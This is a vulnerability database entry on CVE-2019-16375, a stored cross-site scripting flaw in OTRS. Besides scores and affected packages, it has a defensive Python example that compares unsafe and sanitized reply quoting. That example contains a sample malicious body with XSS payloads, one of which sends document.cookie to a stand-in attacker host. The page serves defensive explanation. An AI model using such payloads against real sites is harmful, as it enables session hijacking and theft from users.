CVE-2019-16375: Cross-site Scripting in OTRS

Severity
NVD: 5.4 MEDIUM
OSV: 6.5
EPSS: 0.6% (top 29.20%)
CISA KEV: Not in KEV
Exploit: No known exploits

Timeline
Published: 2020-03-19
Latest update: 2022-05-24

Description

An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.11, and Community Edition 5.0.x through 5.0.37 and 6.0.x through 6.0.22. An attacker who is logged in as an agent or customer user with appropriate permissions can create a carefully crafted string containing malicious JavaScript code as an article body. This malicious code is executed when an agent composes an answer to the original article.
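The mechanism the description outlines is a stored cross-site scripting flaw: HTML submitted as an article body is reused when an agent quotes that article into a reply, so any active content it carries runs in the agent's browser session. The Python below is an added illustration, not OTRS code (OTRS is written in Perl and its actual article rendering path is not reproduced here). It contrasts a reply-quoting routine that inlines the stored body unchanged with one that first passes the body through an allowlist sanitizer. The function names, the allowlist and the sample article body are all constructed for this example.

```python
import html
import re
from html.parser import HTMLParser

# Illustrative allowlist (an assumption for this example, not OTRS's own policy):
# a few formatting tags survive, everything else is dropped, and only <a href> keeps an attribute.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "a",
                "blockquote", "ul", "ol", "li", "div", "span"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
# Tags whose *content* must vanish as well, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
VOID_TAGS = {"br"}


class _Sanitizer(HTMLParser):
    """Rebuilds the input from parsed tokens, keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # > 0 while inside <script>, <style>, ...

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag (img, svg, form, ...) is dropped; its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # removes every on* handler, style=, src=, formaction=, ...
            if name == "href":
                # Browsers ignore control characters and whitespace inside a scheme,
                # so strip them before checking; anything not http/https/mailto is dropped.
                scheme_probe = re.sub(r"[\x00-\x20]", "", value or "").lower()
                if not scheme_probe.startswith(SAFE_URL_SCHEMES):
                    continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            # Re-escape text so "&lt;script&gt;" smuggled as entities stays inert.
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped (conditional-comment tricks included)


def sanitize_html(fragment: str) -> str:
    parser = _Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def quote_article_unsafe(body_html: str) -> str:
    """Vulnerable pattern: the stored article body is inlined verbatim into the reply editor."""
    return f'<blockquote type="cite">{body_html}</blockquote>'


def quote_article_safe(body_html: str) -> str:
    """Hardened: the body is sanitized before it is placed into the agent's compose form."""
    return f'<blockquote type="cite">{sanitize_html(body_html)}</blockquote>'


# Constructed sample article body, mimicking what a malicious customer user could submit.
MALICIOUS_BODY = (
    "<p>Hi support,</p>"
    '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    '<img src="x" onerror="alert(document.domain)">'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="https://example.com/help">help</a>'
    '<p onmouseover="alert(2)">Thanks &lt;b&gt;!</p>'
)

if __name__ == "__main__":
    print(quote_article_unsafe(MALICIOUS_BODY))
    print(quote_article_safe(MALICIOUS_BODY))
```

If the compose form only needs plain text, `html.escape` on the whole body is simpler and strictly safer than an allowlist; the allowlist is only worth its parsing surface when quoted HTML formatting must survive, and even then the sanitizer should run at the point where the body enters the agent's page, not only when it is stored.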

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Exploitability: 2.3 | Impact: 2.7

Affected Packages (2 packages)

Debian: debian/otrs2 < 6.0.23-1 (bullseye)
NVD: otrs/otrs 5.0.0 through 5.0.37 (plus 2 further version ranges)

🔴 Vulnerability Details (2)

GHSA: GHSA-c82j-j7c2-cx75: An issue was discovered in Open Ticket Request System (OTRS) 7 (2022-05-24)
OSV: CVE-2019-16375: An issue was discovered in Open Ticket Request System (OTRS) 7 (2020-03-19)

📋 Vendor Advisories (1)

Debian: CVE-2019-16375: otrs2 - An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.1... (2019)
CVE-2019-16375 — Cross-site Scripting in Otrs | cvebase